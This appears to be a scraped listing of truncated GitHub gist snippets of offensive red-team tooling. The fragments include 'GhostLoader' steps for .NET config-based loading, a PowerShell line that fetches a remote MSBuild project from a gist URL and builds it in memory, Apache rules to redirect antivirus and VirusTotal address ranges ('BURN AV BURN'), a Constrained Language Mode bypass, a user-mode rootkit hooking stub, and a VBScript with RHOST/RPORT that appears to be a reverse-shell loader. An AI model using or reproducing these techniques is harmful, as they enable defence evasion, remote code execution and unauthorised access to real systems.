leoloobeek

GhostLoader Steps :)

1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe

leoloobeek

//Base64 Raw Decoder 

function Base64Decode(str) {
    if (!(/^[a-z0-9+/]+={0,2}$/i.test(str)) || str.length%4 != 0) throw Error('Not base64 string');

    var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    var o1, o2, o3, h1, h2, h3, h4, bits, d=[];

    for (var c=0; c<str.length; c+=4) {  // unpack four hexets into three octets

leoloobeek

function Get-PublicKey
{
    [OutputType([byte[]])]
    PARAM (
        [Uri]$Uri
    )

    if (-Not ($uri.Scheme -eq "https"))
    {
        Write-Error "You can only get keys for https addresses"

leoloobeek

After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-)

These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs.

Basic gist after running PS script statements:

- Loads C# project from file or web URL
- Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"]
- Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"] 
- Launch program (payload)

leoloobeek

In-memory PowerShell XSLT project build: 

[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build'); 
$proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/caseysmithrc/8e58d11bc99e496a19424fbe5a99175f/raw/38256d70b414f6678005366efc86009c562948c6/xslt2.proj")
$e=new-object Microsoft.Build.Evaluation.Project($proj); 
$e.build();

leoloobeek

<?xml version='1.0'?>
<data>
  <circle>
    <radius>12</radius>
  </circle>
  <circle>
    <radius>37.5</radius>
  </circle>
</data>

leoloobeek

	RewriteEngine On
	#LogLevel alert rewrite:trace5
	
	# BURN AV BURN
	
	# ForcePoint
	RewriteCond				expr					"-R '208.80.192.0/21'"	[OR]
	
	# AWS & Other VT hosts
	RewriteCond                             expr                                    "-R '54.0.0.0/8'" [OR]

leoloobeek

function Remove-ConstrainedLanguageMode {
<#
.Synopsis
Set language mode for a powershell session to 'full'.

.Description
Set language mode for a powershell session to 'full'. Leverages 'InstallUtil' 
and the Microsoft.Diagnostics.Runtime.dll resouces to adjust in memory values.

.Example

leoloobeek

#include <windows.h>
#include <stdio.h>


FARPROC fpCreateProcessW;
BYTE bSavedByte;

// Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// tasklist | findstr explore.exe

leoloobeek

Call X()
End Function

Dim RHOST: RHOST = "x.x.x.x"
Dim RPORT: RPORT = "8999"

Function Base64ToStream(b)
  Dim enc, length, ba, transform, ms
  Set enc = CreateObject("System.Text.ASCIIEncoding")
  length = enc.GetByteCount_2(b)